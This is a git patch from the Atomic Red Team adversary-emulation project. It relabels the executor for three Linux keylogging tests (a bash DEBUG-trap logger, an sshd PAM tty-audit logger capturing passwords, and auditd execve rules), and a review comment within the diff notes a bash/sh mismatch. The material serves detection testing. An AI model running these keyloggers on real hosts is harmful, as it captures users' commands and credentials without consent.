From 3c80fa064ef3bcdbd7a52ae159a237800d3878e9 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 20 Sep 2021 18:48:06 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv | 12 ++++++------
 atomics/Indexes/Indexes-CSV/linux-index.csv | 12 ++++++------
 atomics/Indexes/index.yaml | 12 ++++++------
 atomics/T1056.001/T1056.001.md | 18 +++++++++---------
 4 files changed, 27 insertions(+), 27 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 73189ebd..0a126db4 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -37,9 +37,9 @@ credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f1250758
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
 credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
@@ -121,9 +121,9 @@ collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2
 collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index be11958c..3f886051 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -9,9 +9,9 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
@@ -34,9 +34,9 @@ collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or
 collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 90337d18..71f7dccc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2853,7 +2853,7 @@ credential-access:
 type: String
 default: "/tmp/.keyboard.log"
 executor:
- name: command_prompt
+ name: sh
 elevation_required: false
 command: |
 trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
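Review bot: The `name: sh` executor that hunk @@ -2853 assigns to the Bash session based keylogger test does not fit the command shown two lines below it: `trap '…' DEBUG` and `$BASH_COMMAND` are bash-specific, and on hosts where `/bin/sh` is dash the DEBUG trap is not available, so the test would run without producing the log it is meant to produce and any detection validated against it would never be exercised. The same index already uses a `bash` executor for other Linux tests (see the Local Data Staging row in the CSV hunks above), so `name: bash` is the consistent value; the SSHD PAM and Auditd tests, whose commands are plain shell, are fine with `sh`. Since the index, the CSV files and the markdown are generated, the fix belongs in the source atomic definition for 7f85a946-a0ea-48aa-b6ac-8ff539278258, after which hunk @@ -8762 on the next line and the ```sh fence in the markdown hunk @@ -188 would regenerate accordingly. The enclosing atomic_tests entry starts and ends outside the hunk.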
@@ -2889,7 +2889,7 @@ credential-access:
 type: String
 default: ubuntu
 executor:
- name: command_prompt
+ name: sh
 elevation_required: true
 command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
@@ -2917,7 +2917,7 @@ credential-access:
 '
 executor:
- name: command_prompt
+ name: sh
 elevation_required: true
 command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
@@ -8762,7 +8762,7 @@ collection:
 type: String
 default: "/tmp/.keyboard.log"
 executor:
- name: command_prompt
+ name: sh
 elevation_required: false
 command: |
 trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
@@ -8798,7 +8798,7 @@ collection:
 type: String
 default: ubuntu
 executor:
- name: command_prompt
+ name: sh
 elevation_required: true
 command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
@@ -8826,7 +8826,7 @@ collection:
 '
 executor:
- name: command_prompt
+ name: sh
 elevation_required: true
 command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index dc6c9441..cba8f1d1 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -188,17 +188,17 @@ To gain persistence the command could be added to the users .bashrc or .bash_ali
 | output_file | File to store captured commands | String | /tmp/.keyboard.log|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `sh`!
-```cmd
+```sh
 trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
 echo "Hello World!"
 cat #{output_file}
 ```
 #### Cleanup Commands:
-```cmd
+```sh
 rm #{output_file}
 ```
@@ -239,10 +239,10 @@ Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The
 | user_account | Basic ssh user account for testing. | String | ubuntu|
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-```cmd
+```sh
 cp -v /etc/pam.d/sshd /tmp/
 echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
 systemctl restart sshd
@@ -256,7 +256,7 @@ exit
 ```
 #### Cleanup Commands:
-```cmd
+```sh
 cp -fv /tmp/sshd /etc/pam.d/
 ```
@@ -293,17 +293,17 @@ The linux audit tool auditd can be used to capture 32 and 64 bit command executi
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-```cmd
+```sh
 auditctl -a always,exit -F arch=b64 -S execve -k CMDS
 auditctl -a always,exit -F arch=b32 -S execve -k CMDS
 whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
 ```
 #### Cleanup Commands:
-```cmd
+```sh
 systemctl restart auditd
 ```